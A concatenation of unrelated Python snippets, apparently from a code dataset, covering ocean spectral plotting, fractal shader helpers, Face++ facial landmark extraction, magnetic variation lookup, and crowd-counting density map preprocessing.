axes[0].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.0098, 0.1, 'Annual', alpha = 0.5)#transform = ax.transAxes)
axes[1].semilogx(freq_av2, cospec_phase2, color = p_color)
axes[1].set_xlabel('$\omega$ (radians/day)')
axes[1].set_ylabel('Phase $\it{T}$-$\it{PDO}$, degrees')
axes[1].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.075, -110,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes)
axes[1].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.00018, -110,'$\omega_o$', alpha = 0.5)#transform = ax.transAxes)
axes[1].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.0098, -110, 'Annual', alpha = 0.5)#transform = ax.transAxes)
fig.suptitle(tstr)
# fig.tight_layout(pad=2.0)
plt.savefig(path_out + im_name)
plt.show()
| [
"numpy.mean",
"matplotlib.pyplot.savefig",
"SIO_modules.var_fft",
"pandas.read_csv",
"numpy.polyfit",
"scipy.signal.filtfilt",
"pandas.DataFrame",
"numpy.conj",
"scipy.signal.butter",
"numpy.zeros",
"importlib.reload",
"pandas.read_excel",
"numpy.poly1d",
"matplotlib.pyplot.subplots",
"pandas.to_datetime",
"matplotlib.pyplot.show"
]
| [((482, 497), 'importlib.reload', 'reload', (['SIO_mod'], {}), '(SIO_mod)\n', (488, 497), False, 'from importlib import reload\n'), ((539, 661), 'pandas.read_csv', 'pd.read_csv', (['"""/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_SALT_1916-201905.txt"""'], {'sep': '"""\t"""', 'skiprows': '(27)'}), "(\n '/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_SALT_1916-201905.txt'\n , sep='\\t', skiprows=27)\n", (550, 661), True, 'import pandas as pd\n'), ((666, 788), 'pandas.read_csv', 'pd.read_csv', (['"""/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_TEMP_1916_201905.txt"""'], {'sep': '"""\t"""', 'skiprows': '(26)'}), "(\n '/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_TEMP_1916_201905.txt'\n , sep='\\t', skiprows=26)\n", (677, 788), True, 'import pandas as pd\n'), ((793, 884), 'pandas.read_excel', 'pd.read_excel', (['"""/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_data.xlsx"""'], {}), "(\n '/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_data.xlsx')\n", (806, 884), True, 'import pandas as pd\n'), ((899, 1002), 'pandas.read_excel', 'pd.read_excel', (['"""/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_recent_data.xlsx"""'], {}), "(\n '/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_recent_data.xlsx'\n )\n", (912, 1002), True, 'import pandas as pd\n'), ((1004, 1107), 'pandas.read_csv', 'pd.read_csv', (['"""/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_PDO_data.csv"""'], {'skiprows': '(1)'}), "(\n '/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_PDO_data.csv',\n skiprows=1)\n", (1015, 1107), True, 'import pandas as pd\n'), ((1248, 1298), 'pandas.to_datetime', 'pd.to_datetime', (["sal_data[['YEAR', 'MONTH', 'DAY']]"], {}), "(sal_data[['YEAR', 'MONTH', 'DAY']])\n", (1262, 1298), True, 'import pandas as pd\n'), ((1319, 1370), 'pandas.to_datetime', 'pd.to_datetime', (["temp_data[['YEAR', 'MONTH', 'DAY']]"], {}), "(temp_data[['YEAR', 'MONTH', 'DAY']])\n", (1333, 1370), True, 'import pandas as pd\n'), ((1468, 1515), 'pandas.to_datetime', 'pd.to_datetime', (["PDO_data['Date']"], {'format': '"""%Y%m"""'}), "(PDO_data['Date'], format='%Y%m')\n", (1482, 1515), True, 'import pandas as pd\n'), ((2490, 2551), 'numpy.polyfit', 'np.polyfit', (['sal_data.index', "sal_data['SURF_SAL_PSU_NOAVG']", '(1)'], {}), "(sal_data.index, sal_data['SURF_SAL_PSU_NOAVG'], 1)\n", (2500, 2551), True, 'import numpy as np\n'), ((2563, 2581), 'numpy.poly1d', 'np.poly1d', (['sal_fit'], {}), '(sal_fit)\n', (2572, 2581), True, 'import numpy as np\n'), ((2593, 2655), 'numpy.polyfit', 'np.polyfit', (['temp_data.index', "temp_data['SURF_TEMP_C_NOAVG']", '(1)'], {}), "(temp_data.index, temp_data['SURF_TEMP_C_NOAVG'], 1)\n", (2603, 2655), True, 'import numpy as np\n'), ((2668, 2687), 'numpy.poly1d', 'np.poly1d', (['temp_fit'], {}), '(temp_fit)\n', (2677, 2687), True, 'import numpy as np\n'), ((4317, 4343), 'scipy.signal.butter', 'signal.butter', (['(4)', 'w', '"""low"""'], {}), "(4, w, 'low')\n", (4330, 4343), False, 'from scipy import signal\n'), ((4358, 4389), 'scipy.signal.filtfilt', 'signal.filtfilt', (['b', 'a', 'temp_tri'], {}), '(b, a, temp_tri)\n', (4373, 4389), False, 'from scipy import signal\n'), ((4403, 4433), 'scipy.signal.filtfilt', 'signal.filtfilt', (['b', 'a', 'sal_tri'], {}), '(b, a, sal_tri)\n', (4418, 4433), False, 'from scipy import signal\n'), ((4589, 4649), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['Temp_freq', 'Temp_spec', 'Temp_fft']"}), "(columns=['Temp_freq', 'Temp_spec', 'Temp_fft'])\n", (4601, 4649), 
True, 'import pandas as pd\n'), ((4669, 4726), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['Sal_freq', 'Sal_spec', 'Sal_fft']"}), "(columns=['Sal_freq', 'Sal_spec', 'Sal_fft'])\n", (4681, 4726), True, 'import pandas as pd\n'), ((4746, 4803), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['PDO_freq', 'PDO_spec', 'PDO_fft']"}), "(columns=['PDO_freq', 'PDO_spec', 'PDO_fft'])\n", (4758, 4803), True, 'import pandas as pd\n'), ((4824, 4884), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['ENSO_freq', 'ENSO_spec', 'ENSO_fft']"}), "(columns=['ENSO_freq', 'ENSO_spec', 'ENSO_fft'])\n", (4836, 4884), True, 'import pandas as pd\n'), ((7778, 7807), 'SIO_modules.var_fft', 'SIO_mod.var_fft', (['temp_sampled'], {}), '(temp_sampled)\n', (7793, 7807), True, 'import SIO_modules as SIO_mod\n'), ((8099, 8135), 'numpy.conj', 'np.conj', (["spectra_ENSO_df['ENSO_fft']"], {}), "(spectra_ENSO_df['ENSO_fft'])\n", (8106, 8135), True, 'import numpy as np\n'), ((8615, 8664), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': 'NR', 'ncols': 'NC', 'figsize': '(10, 7)'}), '(nrows=NR, ncols=NC, figsize=(10, 7))\n', (8627, 8664), True, 'import matplotlib.pyplot as plt\n'), ((9965, 9996), 'matplotlib.pyplot.savefig', 'plt.savefig', (['(path_out + im_name)'], {}), '(path_out + im_name)\n', (9976, 9996), True, 'import matplotlib.pyplot as plt\n'), ((9997, 10007), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (10005, 10007), True, 'import matplotlib.pyplot as plt\n'), ((10457, 10491), 'numpy.conj', 'np.conj', (["spectra_PDO_df['PDO_fft']"], {}), "(spectra_PDO_df['PDO_fft'])\n", (10464, 10491), True, 'import numpy as np\n'), ((10833, 10882), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': 'NR', 'ncols': 'NC', 'figsize': '(10, 7)'}), '(nrows=NR, ncols=NC, figsize=(10, 7))\n', (10845, 10882), True, 'import matplotlib.pyplot as plt\n'), ((12181, 12212), 'matplotlib.pyplot.savefig', 'plt.savefig', (['(path_out + im_name)'], {}), '(path_out + im_name)\n', (12192, 12212), True, 'import matplotlib.pyplot as plt\n'), ((12213, 12223), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (12221, 12223), True, 'import matplotlib.pyplot as plt\n'), ((5409, 5438), 'SIO_modules.var_fft', 'SIO_mod.var_fft', (['data_sets[j]'], {}), '(data_sets[j])\n', (5424, 5438), True, 'import SIO_modules as SIO_mod\n'), ((6441, 6455), 'numpy.zeros', 'np.zeros', (['nmax'], {}), '(nmax)\n', (6449, 6455), True, 'import numpy as np\n'), ((6474, 6488), 'numpy.zeros', 'np.zeros', (['nmax'], {}), '(nmax)\n', (6482, 6488), True, 'import numpy as np\n'), ((6501, 6515), 'numpy.zeros', 'np.zeros', (['nmax'], {}), '(nmax)\n', (6509, 6515), True, 'import numpy as np\n'), ((7178, 7211), 'numpy.mean', 'np.mean', (['spectrum_amp[i:i + n_av]'], {}), '(spectrum_amp[i:i + n_av])\n', (7185, 7211), True, 'import numpy as np\n'), ((7233, 7268), 'numpy.mean', 'np.mean', (['spectrum_phase[i:i + n_av]'], {}), '(spectrum_phase[i:i + n_av])\n', (7240, 7268), True, 'import numpy as np\n'), ((6692, 6709), 'numpy.conj', 'np.conj', (['fft_var2'], {}), '(fft_var2)\n', (6699, 6709), True, 'import numpy as np\n'), ((6774, 6791), 'numpy.conj', 'np.conj', (['fft_var2'], {}), '(fft_var2)\n', (6781, 6791), True, 'import numpy as np\n')] |
import numpy as np
def normalize(x):
return x / np.linalg.norm(x)
def norm_sq(v):
return np.dot(v,v)
def norm(v):
return np.linalg.norm(v)
def get_sub_keys(v):
if type(v) is not tuple and type(v) is not list:
return []
return [k for k in v if type(k) is str]
def to_vec3(v):
if isinstance(v, (float, int)):
return np.array([v, v, v], dtype=np.float32)
elif len(get_sub_keys(v)) > 0:
return v
else:
return np.array([v[0], v[1], v[2]], dtype=np.float32)
def to_str(x):
if type(x) is bool:
return "1" if x else "0"
elif isinstance(x, (list, tuple)):
return vec3_str(x)
else:
return str(x)
def float_str(x):
if type(x) is str:
return '_' + x
else:
return str(x)
def vec3_str(v):
if type(v) is str:
return '_' + v
elif isinstance(v, (float, int)):
return 'vec3(' + str(v) + ')'
else:
return 'vec3(' + float_str(v[0]) + ',' + float_str(v[1]) + ',' + float_str(v[2]) + ')'
def vec3_eq(v, val):
if type(v) is str:
return False
for i in range(3):
if v[i] != val[i]:
return False
return True
def smin(a, b, k):
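    # polynomial smooth minimum: blends between a and b over a band of width k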
h = min(max(0.5 + 0.5*(b - a)/k, 0.0), 1.0)
return b*(1 - h) + a*h - k*h*(1.0 - h)
def get_global(k):
if type(k) is str:
return _mandelbruh_GLOBAL_VARS[k]
elif type(k) is tuple or type(k) is list:
return np.array([get_global(i) for i in k], dtype=np.float32)
else:
return k
def set_global_float(k):
if type(k) is str:
_mandelbruh_GLOBAL_VARS[k] = 0.0
return k
def set_global_vec3(k):
if type(k) is str:
_mandelbruh_GLOBAL_VARS[k] = to_vec3((0,0,0))
return k
elif isinstance(k, (float, int)):
return to_vec3(k)
else:
sk = get_sub_keys(k)
for i in sk:
_mandelbruh_GLOBAL_VARS[i] = 0.0
return to_vec3(k)
def cond_offset(p):
if type(p) is str or np.count_nonzero(p) > 0:
return ' - vec4(' + vec3_str(p) + ', 0)'
return ''
def cond_subtract(p):
if type(p) is str or p > 0:
return ' - ' + float_str(p)
return ''
def make_color(geo):
if type(geo.color) is tuple or type(geo.color) is np.ndarray:
return 'vec4(' + vec3_str(geo.color) + ', ' + geo.glsl() + ')'
elif geo.color == 'orbit' or geo.color == 'o':
return 'vec4(orbit, ' + geo.glsl() + ')'
else:
raise Exception("Invalid coloring type")
_mandelbruh_GLOBAL_VARS = {}
| [
"numpy.count_nonzero",
"numpy.array",
"numpy.dot",
"numpy.linalg.norm"
]
| [((93, 105), 'numpy.dot', 'np.dot', (['v', 'v'], {}), '(v, v)\n', (99, 105), True, 'import numpy as np\n'), ((127, 144), 'numpy.linalg.norm', 'np.linalg.norm', (['v'], {}), '(v)\n', (141, 144), True, 'import numpy as np\n'), ((50, 67), 'numpy.linalg.norm', 'np.linalg.norm', (['x'], {}), '(x)\n', (64, 67), True, 'import numpy as np\n'), ((329, 366), 'numpy.array', 'np.array', (['[v, v, v]'], {'dtype': 'np.float32'}), '([v, v, v], dtype=np.float32)\n', (337, 366), True, 'import numpy as np\n'), ((426, 472), 'numpy.array', 'np.array', (['[v[0], v[1], v[2]]'], {'dtype': 'np.float32'}), '([v[0], v[1], v[2]], dtype=np.float32)\n', (434, 472), True, 'import numpy as np\n'), ((1741, 1760), 'numpy.count_nonzero', 'np.count_nonzero', (['p'], {}), '(p)\n', (1757, 1760), True, 'import numpy as np\n')] |
"""
recognize face landmark
"""
import json
import os
import requests
import numpy as np
FACE_POINTS = list(range(0, 83))
JAW_POINTS = list(range(0, 19))
LEFT_EYE_POINTS = list(range(19, 29))
LEFT_BROW_POINTS = list(range(29, 37))
MOUTH_POINTS = list(range(37, 55))
NOSE_POINTS = list(range(55, 65))
RIGHT_EYE_POINTS = list(range(65, 75))
RIGHT_BROW_POINTS = list(range(75, 83))
LEFT_FACE = list(range(0, 10)) + list(range(29, 34))
RIGHT_FACE = list(range(9, 19)) + list(range(75, 80))
JAW_END = 19
FACE_START = 0
FACE_END = 83
OVERLAY_POINTS = [
LEFT_FACE,
RIGHT_FACE,
JAW_POINTS,
]
def face_points(image):
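    # Load cached landmark points from "<image>.txt" if present; otherwise query the Face++ detect API and cache the response.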
points = []
txt = image + '.txt'
if os.path.isfile(txt):
with open(txt) as file:
for line in file:
points = line
elif os.path.isfile(image):
points = landmarks_by_face__(image)
with open(txt, 'w') as file:
file.write(str(points))
faces = json.loads(points)['faces']
if len(faces) == 0:
err = 404
else:
err = 0
matrix_list = np.matrix(matrix_marks(faces[0]['landmark']))
point_list = []
for p in matrix_list.tolist():
point_list.append((int(p[0]), int(p[1])))
return matrix_list, point_list, err
def landmarks_by_face__(image):
url = 'https://api-cn.faceplusplus.com/facepp/v3/detect'
params = {
'api_key': '<KEY>',
'api_secret': '<KEY>',
'return_landmark': 1,
}
file = {'image_file': open(image, 'rb')}
r = requests.post(url=url, files=file, data=params)
if r.status_code == requests.codes.ok:
return r.content.decode('utf-8')
else:
return r.content
def matrix_rectangle(left, top, width, height):
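    # eight reference points on the rectangle border: the four corners plus the midpoint of each edge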
pointer = [
(left, top),
(left + width / 2, top),
(left + width - 1, top),
(left + width - 1, top + height / 2),
(left, top + height / 2),
(left, top + height - 1),
(left + width / 2, top + height - 1),
(left + width - 1, top + height - 1)
]
return pointer
def matrix_marks(res):
pointer = [
[res['contour_left1']['x'], res['contour_left1']['y']],
[res['contour_left2']['x'], res['contour_left2']['y']],
[res['contour_left3']['x'], res['contour_left3']['y']],
[res['contour_left4']['x'], res['contour_left4']['y']],
[res['contour_left5']['x'], res['contour_left5']['y']],
[res['contour_left6']['x'], res['contour_left6']['y']],
[res['contour_left7']['x'], res['contour_left7']['y']],
[res['contour_left8']['x'], res['contour_left8']['y']],
[res['contour_left9']['x'], res['contour_left9']['y']],
[res['contour_chin']['x'], res['contour_chin']['y']],
[res['contour_right9']['x'], res['contour_right9']['y']],
[res['contour_right8']['x'], res['contour_right8']['y']],
[res['contour_right7']['x'], res['contour_right7']['y']],
[res['contour_right6']['x'], res['contour_right6']['y']],
[res['contour_right5']['x'], res['contour_right5']['y']],
[res['contour_right4']['x'], res['contour_right4']['y']],
[res['contour_right3']['x'], res['contour_right3']['y']],
[res['contour_right2']['x'], res['contour_right2']['y']],
[res['contour_right1']['x'], res['contour_right1']['y']],
[res['left_eye_bottom']['x'], res['left_eye_bottom']['y']],
[res['left_eye_center']['x'], res['left_eye_center']['y']],
[res['left_eye_left_corner']['x'], res['left_eye_left_corner']['y']],
[res['left_eye_lower_left_quarter']['x'], res['left_eye_lower_left_quarter']['y']],
[res['left_eye_lower_right_quarter']['x'], res['left_eye_lower_right_quarter']['y']],
[res['left_eye_pupil']['x'], res['left_eye_pupil']['y']],
[res['left_eye_right_corner']['x'], res['left_eye_right_corner']['y']],
[res['left_eye_top']['x'], res['left_eye_top']['y']],
[res['left_eye_upper_left_quarter']['x'], res['left_eye_upper_left_quarter']['y']],
[res['left_eye_upper_right_quarter']['x'], res['left_eye_upper_right_quarter']['y']],
[res['left_eyebrow_left_corner']['x'], res['left_eyebrow_left_corner']['y']],
[res['left_eyebrow_upper_left_quarter']['x'], res['left_eyebrow_upper_left_quarter']['y']],
[res['left_eyebrow_upper_middle']['x'], res['left_eyebrow_upper_middle']['y']],
[res['left_eyebrow_upper_right_quarter']['x'], res['left_eyebrow_upper_right_quarter']['y']],
[res['left_eyebrow_right_corner']['x'], res['left_eyebrow_right_corner']['y']],
[res['left_eyebrow_lower_left_quarter']['x'], res['left_eyebrow_lower_left_quarter']['y']],
[res['left_eyebrow_lower_middle']['x'], res['left_eyebrow_lower_middle']['y']],
[res['left_eyebrow_lower_right_quarter']['x'], res['left_eyebrow_lower_right_quarter']['y']],
[res['mouth_left_corner']['x'], res['mouth_left_corner']['y']],
[res['mouth_lower_lip_bottom']['x'], res['mouth_lower_lip_bottom']['y']],
[res['mouth_lower_lip_left_contour1']['x'], res['mouth_lower_lip_left_contour1']['y']],
[res['mouth_lower_lip_left_contour2']['x'], res['mouth_lower_lip_left_contour2']['y']],
[res['mouth_lower_lip_left_contour3']['x'], res['mouth_lower_lip_left_contour3']['y']],
[res['mouth_lower_lip_right_contour1']['x'], res['mouth_lower_lip_right_contour1']['y']],
[res['mouth_lower_lip_right_contour2']['x'], res['mouth_lower_lip_right_contour2']['y']],
[res['mouth_lower_lip_right_contour3']['x'], res['mouth_lower_lip_right_contour3']['y']],
[res['mouth_lower_lip_top']['x'], res['mouth_lower_lip_top']['y']],
[res['mouth_right_corner']['x'], res['mouth_right_corner']['y']],
[res['mouth_upper_lip_bottom']['x'], res['mouth_upper_lip_bottom']['y']],
[res['mouth_upper_lip_left_contour1']['x'], res['mouth_upper_lip_left_contour1']['y']],
[res['mouth_upper_lip_left_contour2']['x'], res['mouth_upper_lip_left_contour2']['y']],
[res['mouth_upper_lip_left_contour3']['x'], res['mouth_upper_lip_left_contour3']['y']],
[res['mouth_upper_lip_right_contour1']['x'], res['mouth_upper_lip_right_contour1']['y']],
[res['mouth_upper_lip_right_contour2']['x'], res['mouth_upper_lip_right_contour2']['y']],
[res['mouth_upper_lip_right_contour3']['x'], res['mouth_upper_lip_right_contour3']['y']],
[res['mouth_upper_lip_top']['x'], res['mouth_upper_lip_top']['y']],
[res['nose_contour_left1']['x'], res['nose_contour_left1']['y']],
[res['nose_contour_left2']['x'], res['nose_contour_left2']['y']],
[res['nose_contour_left3']['x'], res['nose_contour_left3']['y']],
[res['nose_contour_lower_middle']['x'], res['nose_contour_lower_middle']['y']],
[res['nose_contour_right1']['x'], res['nose_contour_right1']['y']],
[res['nose_contour_right2']['x'], res['nose_contour_right2']['y']],
[res['nose_contour_right3']['x'], res['nose_contour_right3']['y']],
[res['nose_left']['x'], res['nose_left']['y']],
[res['nose_right']['x'], res['nose_right']['y']],
[res['nose_tip']['x'], res['nose_tip']['y']],
[res['right_eye_bottom']['x'], res['right_eye_bottom']['y']],
[res['right_eye_center']['x'], res['right_eye_center']['y']],
[res['right_eye_left_corner']['x'], res['right_eye_left_corner']['y']],
[res['right_eye_lower_left_quarter']['x'], res['right_eye_lower_left_quarter']['y']],
[res['right_eye_lower_right_quarter']['x'], res['right_eye_lower_right_quarter']['y']],
[res['right_eye_pupil']['x'], res['right_eye_pupil']['y']],
[res['right_eye_right_corner']['x'], res['right_eye_right_corner']['y']],
[res['right_eye_top']['x'], res['right_eye_top']['y']],
[res['right_eye_upper_left_quarter']['x'], res['right_eye_upper_left_quarter']['y']],
[res['right_eye_upper_right_quarter']['x'], res['right_eye_upper_right_quarter']['y']],
[res['right_eyebrow_left_corner']['x'], res['right_eyebrow_left_corner']['y']],
[res['right_eyebrow_upper_left_quarter']['x'], res['right_eyebrow_upper_left_quarter']['y']],
[res['right_eyebrow_upper_middle']['x'], res['right_eyebrow_upper_middle']['y']],
[res['right_eyebrow_upper_right_quarter']['x'], res['right_eyebrow_upper_right_quarter']['y']],
[res['right_eyebrow_right_corner']['x'], res['right_eyebrow_right_corner']['y']],
[res['right_eyebrow_lower_left_quarter']['x'], res['right_eyebrow_lower_left_quarter']['y']],
[res['right_eyebrow_lower_middle']['x'], res['right_eyebrow_lower_middle']['y']],
[res['right_eyebrow_lower_right_quarter']['x'], res['right_eyebrow_lower_right_quarter']['y']],
]
return pointer
| [
"os.path.isfile",
"json.loads",
"requests.post"
]
| [((676, 695), 'os.path.isfile', 'os.path.isfile', (['txt'], {}), '(txt)\n', (690, 695), False, 'import os\n'), ((1519, 1566), 'requests.post', 'requests.post', ([], {'url': 'url', 'files': 'file', 'data': 'params'}), '(url=url, files=file, data=params)\n', (1532, 1566), False, 'import requests\n'), ((798, 819), 'os.path.isfile', 'os.path.isfile', (['image'], {}), '(image)\n', (812, 819), False, 'import os\n'), ((951, 969), 'json.loads', 'json.loads', (['points'], {}), '(points)\n', (961, 969), False, 'import json\n')] |
import requests
import time
from bs4 import BeautifulSoup
import re
def decdeg2dms(dd):
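    # Convert decimal degrees to a (degrees, minutes, seconds) tuple, keeping the sign on the first non-zero component.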
negative = dd < 0
dd = abs(dd)
minutes,seconds = divmod(dd*3600,60)
degrees,minutes = divmod(minutes,60)
if negative:
if degrees > 0:
degrees = -degrees
elif minutes > 0:
minutes = -minutes
else:
seconds = -seconds
return (degrees,minutes,seconds)
def get_mag_var(lat, lon, year, month, day, elev=0):
"""Returns the magnetic variation at a particulat point on earth.
Keyword Arguments
lat -- latitude (e.g. -180.6 deg)
lon -- longitude (e.g. -34.6 deg)
elev -- elevation in km (default 0.0)
year -- year (e.g. 2015)
month -- month (e.g. 11)
day -- day (e.g. 30)
Returns
float -- magnetic variation
"""
(latd, latm, lats) = decdeg2dms(lat)
(lond, lonm, lons) = decdeg2dms(lon)
payload = {'latd': latd,'latm':latm,'lats':lats,'lond':lond,'lonm':lonm,
'lons':lons,'elev':elev,'year':year,'month':month,'day':day,'Ein':'D'}
url = 'http://www.ga.gov.au/oracle/cgi/geoAGRF.sh'
# Sleep to avoid spamming server
time.sleep(1)
r = requests.get(url, params=payload)
if r.status_code == 200:
c = r.content
soup = BeautifulSoup(c,'html.parser')
deg_text = soup.find_all('b')[-1].text.strip()
# strip out the junk so we have a number
# Strip spaces before the search
deg_text = deg_text.replace(" ","")
deg = re.search(r'D=(.*?)deg', deg_text).group(1)
deg = float(deg)
return deg
else:
return 'something went wrong' | [
"bs4.BeautifulSoup",
"requests.get",
"time.sleep",
"re.search"
]
| [((1154, 1167), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (1164, 1167), False, 'import time\n'), ((1177, 1210), 'requests.get', 'requests.get', (['url'], {'params': 'payload'}), '(url, params=payload)\n', (1189, 1210), False, 'import requests\n'), ((1277, 1308), 'bs4.BeautifulSoup', 'BeautifulSoup', (['c', '"""html.parser"""'], {}), "(c, 'html.parser')\n", (1290, 1308), False, 'from bs4 import BeautifulSoup\n'), ((1511, 1544), 're.search', 're.search', (['"""D=(.*?)deg"""', 'deg_text'], {}), "('D=(.*?)deg', deg_text)\n", (1520, 1544), False, 'import re\n')] |
# -*- coding:utf-8 -*-
# ------------------------
# written by <NAME>
# 2018-10
# ------------------------
import os
import skimage.io
from skimage.color import rgb2gray
import skimage.transform
from scipy.io import loadmat
import numpy as np
import cv2
import math
import warnings
import random
import torch
import matplotlib.pyplot as plt
warnings.filterwarnings("ignore")
def gaussian_kernel(image, points):
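    # Build a crowd-density map by adding a small 2-D Gaussian (f_sz=15, sigma=4.0), clipped at the image borders, at each annotated head location.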
image_density = np.zeros(image.shape)
h, w = image_density.shape
if len(points) == 0:
return image_density
for j in range(len(points)):
f_sz = 15
sigma = 4.0
# convert x, y to int
x = min(w, max(0, int(points[j, 0])))
y = min(h, max(0, int(points[j, 1])))
gap = f_sz // 2
x1 = x - gap if x - gap > 0 else 0
x2 = x + gap if x + gap < w else w - 1
y1 = y - gap if y - gap > 0 else 0
y2 = y + gap if y + gap < h else h - 1
# generate 2d gaussian kernel
kx = cv2.getGaussianKernel(y2 - y1 + 1, sigma=sigma)
ky = cv2.getGaussianKernel(x2 - x1 + 1, sigma=sigma)
gaussian = np.multiply(kx, ky.T)
image_density[y1:y2 + 1, x1:x2 + 1] += gaussian
return image_density
def extract_data(mode="train", patch_number=9, part="A"):
num_images = 300 if mode=="train" else 182
# original path
dataset_path = "../data/original/part_{0}_final/".format(part)
mode_data = os.path.join(dataset_path, "{0}_data".format(mode))
mode_images = os.path.join(mode_data, "images")
mode_ground_truth = os.path.join(mode_data, "ground_truth")
# preprocessed path
preprocessed_mode = "../data/preprocessed/{0}/".format(mode)
preprocessed_mode_density = "../data/preprocessed/{0}_density/".format(mode)
if not os.path.exists("../data/preprocessed/"):
os.mkdir("../data/preprocessed/")
if not os.path.exists(preprocessed_mode):
os.mkdir(preprocessed_mode)
if not os.path.exists(preprocessed_mode_density):
os.mkdir(preprocessed_mode_density)
# convert images to gray-density for each
for index in range(1, num_images + 1):
if index % 10 == 9:
print("{0} images have been processed".format(index + 1))
image_path = os.path.join(mode_images, "IMG_{0}.jpg".format(index))
ground_truth_path = os.path.join(mode_ground_truth, "GT_IMG_{0}.mat".format(index))
image = skimage.io.imread(image_path)
# convert to gray map
if image.shape[-1] == 3:
image = rgb2gray(image)
mat = loadmat(ground_truth_path)
image_info = mat["image_info"]
ann_points = image_info[0][0][0][0][0]
# gaussian transfer
image_density = gaussian_kernel(image, ann_points)
# split image into 9 patches where patch is 1/4 size
h, w = image.shape
w_block = math.floor(w / 8)
h_block = math.floor(h / 8)
for j in range(patch_number):
x = math.floor((w - 2 * w_block) * random.random() + w_block)
y = math.floor((h - 2 * h_block) * random.random() + h_block)
image_sample = image[y - h_block:y + h_block, x - w_block:x + w_block]
image_density_sample = image_density[y - h_block:y + h_block, x - w_block:x + w_block]
img_idx = "{0}_{1}".format(index, j)
np.save(os.path.join(preprocessed_mode_density, "{0}.npy".format(img_idx)), image_density_sample)
skimage.io.imsave(os.path.join(preprocessed_mode, "{0}.jpg".format(img_idx)), image_sample)
def extract_test_data(part="A"):
num_images = 183 if part == "A" else 317
test_data_path = "../data/original/part_{part}_final/test_data/images".format(part=part)
test_ground_path = "../data/original/part_{part}_final/test_data/ground_truth".format(part=part)
test_density_path = "../data/preprocessed/test_density"
print("create directory........")
if not os.path.exists(test_density_path):
os.mkdir(test_density_path)
print("begin to preprocess test data........")
for index in range(1, num_images):
if index % 10 == 0:
print("{num} images are done".format(num=index))
image_path = os.path.join(test_data_path, "IMG_{0}.jpg".format(index))
ground_truth_path = os.path.join(test_ground_path, "GT_IMG_{0}.mat".format(index))
# load mat and image
image = skimage.io.imread(image_path)
if image.shape[-1] == 3:
image = rgb2gray(image)
mat = loadmat(ground_truth_path)
image_info = mat["image_info"]
# ann_points: points pixels mean people
# number: number of people in the image
ann_points = image_info[0][0][0][0][0]
number = image_info[0][0][0][0][1]
h = float(image.shape[0])
w = float(image.shape[1])
# convert images to density
image_density = gaussian_kernel(image, ann_points)
np.save(os.path.join(test_density_path, "IMG_{0}.npy".format(index)), image_density)
extract_test_data()
| [
"os.path.exists",
"numpy.multiply",
"skimage.color.rgb2gray",
"math.floor",
"scipy.io.loadmat",
"os.path.join",
"cv2.getGaussianKernel",
"numpy.zeros",
"os.mkdir",
"random.random",
"warnings.filterwarnings"
]
| [((342, 375), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (365, 375), False, 'import warnings\n'), ((434, 455), 'numpy.zeros', 'np.zeros', (['image.shape'], {}), '(image.shape)\n', (442, 455), True, 'import numpy as np\n'), ((1505, 1538), 'os.path.join', 'os.path.join', (['mode_data', '"""images"""'], {}), "(mode_data, 'images')\n", (1517, 1538), False, 'import os\n'), ((1563, 1602), 'os.path.join', 'os.path.join', (['mode_data', '"""ground_truth"""'], {}), "(mode_data, 'ground_truth')\n", (1575, 1602), False, 'import os\n'), ((992, 1039), 'cv2.getGaussianKernel', 'cv2.getGaussianKernel', (['(y2 - y1 + 1)'], {'sigma': 'sigma'}), '(y2 - y1 + 1, sigma=sigma)\n', (1013, 1039), False, 'import cv2\n'), ((1053, 1100), 'cv2.getGaussianKernel', 'cv2.getGaussianKernel', (['(x2 - x1 + 1)'], {'sigma': 'sigma'}), '(x2 - x1 + 1, sigma=sigma)\n', (1074, 1100), False, 'import cv2\n'), ((1120, 1141), 'numpy.multiply', 'np.multiply', (['kx', 'ky.T'], {}), '(kx, ky.T)\n', (1131, 1141), True, 'import numpy as np\n'), ((1784, 1823), 'os.path.exists', 'os.path.exists', (['"""../data/preprocessed/"""'], {}), "('../data/preprocessed/')\n", (1798, 1823), False, 'import os\n'), ((1833, 1866), 'os.mkdir', 'os.mkdir', (['"""../data/preprocessed/"""'], {}), "('../data/preprocessed/')\n", (1841, 1866), False, 'import os\n'), ((1878, 1911), 'os.path.exists', 'os.path.exists', (['preprocessed_mode'], {}), '(preprocessed_mode)\n', (1892, 1911), False, 'import os\n'), ((1921, 1948), 'os.mkdir', 'os.mkdir', (['preprocessed_mode'], {}), '(preprocessed_mode)\n', (1929, 1948), False, 'import os\n'), ((1960, 2001), 'os.path.exists', 'os.path.exists', (['preprocessed_mode_density'], {}), '(preprocessed_mode_density)\n', (1974, 2001), False, 'import os\n'), ((2011, 2046), 'os.mkdir', 'os.mkdir', (['preprocessed_mode_density'], {}), '(preprocessed_mode_density)\n', (2019, 2046), False, 'import os\n'), ((2562, 2588), 'scipy.io.loadmat', 'loadmat', (['ground_truth_path'], {}), 